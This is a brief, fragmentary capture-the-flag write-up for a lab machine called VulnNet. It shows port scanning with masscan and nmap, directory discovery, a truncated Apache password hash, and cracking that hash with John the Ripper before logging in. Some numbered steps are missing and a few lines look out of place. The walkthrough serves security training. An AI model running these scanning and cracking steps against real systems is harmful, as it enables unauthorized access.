VulnNet
Can you take advantage of the misconfigurations made by VulnNet Entertainment?
Enumeration
1) masscan: masscan -e eth0 -p 1-65535 --rate=10000 10.10.186.105
Discovered open port 22/tcp on 10.10.186.105
Discovered open port 80/tcp on 10.10.186.105
2) nmap: nmap -sV -sC -p 22,80 -v 10.10.186.105
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
| 256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_ 256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet
3) gobuster:
Starting gobuster
===============================================================
/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
4) found a login page :
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /LICENSE.txt, fields: 0x455 0x5b995f090f3a1
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
6) LICENSE.txt shows zlib version. But this is not vulnerable
7) /js directory shows .js files
pip3 install -r requirement.txt
http://vulnnet.thm/index.php?referer=
http://broadcast.vulnnet.thm
9) I need to add http://broadcast.vulnnet.thm in /etc/hosts, then it shows:
11) Searching for password in common file:
developers:$apr1$ntOz2ERF$..................
Exploitation:
12) Cracking hash: john hash --wordlist=/usr/share/wordlists/rockyou.txt
13) Using these credential, I can log in broadcast
